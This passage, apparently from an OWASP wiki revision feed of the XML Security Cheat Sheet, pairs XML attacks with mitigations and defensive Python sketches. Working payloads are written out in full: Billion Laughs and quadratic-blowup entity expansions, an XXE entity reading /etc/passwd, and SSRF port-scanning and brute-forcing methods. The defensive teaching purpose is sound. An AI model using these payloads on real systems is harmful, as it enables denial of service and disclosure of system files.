When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The following attack expands to 100,000 * 100,000 = 10^10 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; that it contains; each of these will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, which could make the parser crash. &lt;br /&gt;
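&lt;br /&gt;
The arithmetic behind this expansion can be checked with a short Python calculation. The helper &amp;lt;tt&amp;gt;expanded_length&amp;lt;/tt&amp;gt; is a hypothetical name introduced only for this illustration; it assumes every level references the previous entity the same number of times, as in the example above.&lt;br /&gt;

```python
def expanded_length(base_text, fan_out, levels):
    """Length of the text produced by `levels` nested entities, each
    referencing the previous one `fan_out` times."""
    return len(base_text) * fan_out ** levels


# LOL1 to LOL9 are nine levels of ten references each.
copies = 10 ** 9
characters = expanded_length("LOL", 10, 9)
print(copies, characters)  # 1000000000 3000000000
```

A document of under one kilobyte therefore asks the parser to materialize about three billion characters.&lt;br /&gt;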
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD xmlns=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
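&lt;br /&gt;
One way to disable inline DTDs is to abort parsing as soon as a document type declaration is seen. The following Python sketch uses the standard library &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module; the names &amp;lt;tt&amp;gt;parse_rejecting_dtd&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;DoctypeForbidden&amp;lt;/tt&amp;gt; are hypothetical, and the function only checks the document rather than building a tree.&lt;br /&gt;

```python
import xml.parsers.expat


class DoctypeForbidden(Exception):
    """Raised when a document carries a document type declaration."""


def parse_rejecting_dtd(data):
    """Parse XML bytes, aborting as soon as a DOCTYPE declaration appears."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here stops the parse before any declared entity is used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)
```

Documents without a DTD pass through unchanged, while any document that declares one is rejected before its entities can be expanded.&lt;br /&gt;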
&lt;br /&gt;
=== File Retrieval ===&lt;br /&gt;
Consider the following example of an XML External Entity (XXE) attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE includeme [&lt;br /&gt;
   &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
 &amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test whether you are able to establish remote connections:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on because you receive the complete responses from the server being queried, giving you an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be much shorter (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224412</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224412"/>
				<updated>2016-12-21T17:06:57Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
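&lt;br /&gt;
This comparison can be sketched in Python with the standard library parser. The function names &amp;lt;tt&amp;gt;parse_seconds&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;slowdown&amp;lt;/tt&amp;gt; and the default of 100 repetitions are assumptions made for this example; the same measurement should be repeated with whichever XML processor the application actually uses.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def parse_seconds(data, repeats=100):
    """Return the average time, in seconds, spent parsing data."""
    started = time.perf_counter()
    for _ in range(repeats):
        try:
            ET.fromstring(data)
        except ET.ParseError:
            # A malformed document is expected to fail; only the time matters.
            pass
    return (time.perf_counter() - started) / repeats


def slowdown(well_formed, malformed, repeats=100):
    """Ratio of malformed to well-formed parse time; above 1 means slower."""
    return parse_seconds(malformed, repeats) / parse_seconds(well_formed, repeats)
```

A ratio well above 1 for realistic documents suggests that malformed input is disproportionately expensive for that processor.&lt;br /&gt;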
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
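&lt;br /&gt;
Limits of this kind can be sketched in Python with the event-driven &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module. The names &amp;lt;tt&amp;gt;parse_with_limits&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;LimitExceeded&amp;lt;/tt&amp;gt; and the default limits are hypothetical values chosen for illustration; the sketch counts elements only, not attributes or entities.&lt;br /&gt;

```python
import xml.parsers.expat


class LimitExceeded(Exception):
    """Raised when a document is nested or populated beyond the limits."""


def parse_with_limits(data, max_depth=100, max_elements=10_000):
    """Parse XML bytes, aborting once nesting depth or element count is exceeded."""
    parser = xml.parsers.expat.ParserCreate()
    state = {"depth": 0, "elements": 0}

    def on_start(name, attributes):
        state["depth"] += 1
        state["elements"] += 1
        if state["depth"] > max_depth or state["elements"] > max_elements:
            raise LimitExceeded(f"limit exceeded at element {name!r}")

    def on_end(name):
        state["depth"] -= 1

    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return state["elements"]
```

Because the handlers run while the document is being read, a document with thousands of unclosed elements is rejected as soon as the limit is crossed.&lt;br /&gt;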
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
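&lt;br /&gt;
Where a schema validator is not available, the same structural control can be approximated in application code. The following Python sketch is an illustration, not a replacement for a schema: the function name &amp;lt;tt&amp;gt;parse_purchase&amp;lt;/tt&amp;gt; is hypothetical, and it assumes that both values are non-negative integers.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def parse_purchase(data):
    """Return (id, price) only if the document has exactly the expected shape."""
    root = ET.fromstring(data)
    child_tags = [child.tag for child in root]
    # Exactly one id followed by exactly one price; anything else is rejected.
    if root.tag != "buy" or child_tags != ["id", "price"]:
        raise ValueError(f"unexpected structure: {root.tag} {child_tags}")
    item_id = root.findtext("id")
    price = root.findtext("price")
    if not (item_id.isdigit() and price.isdigit()):
        raise ValueError("id and price must be non-negative integers")
    return int(item_id), int(price)
```

The document with the injected &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element shown above has four children instead of two, so it is rejected before either value is read.&lt;br /&gt;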
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
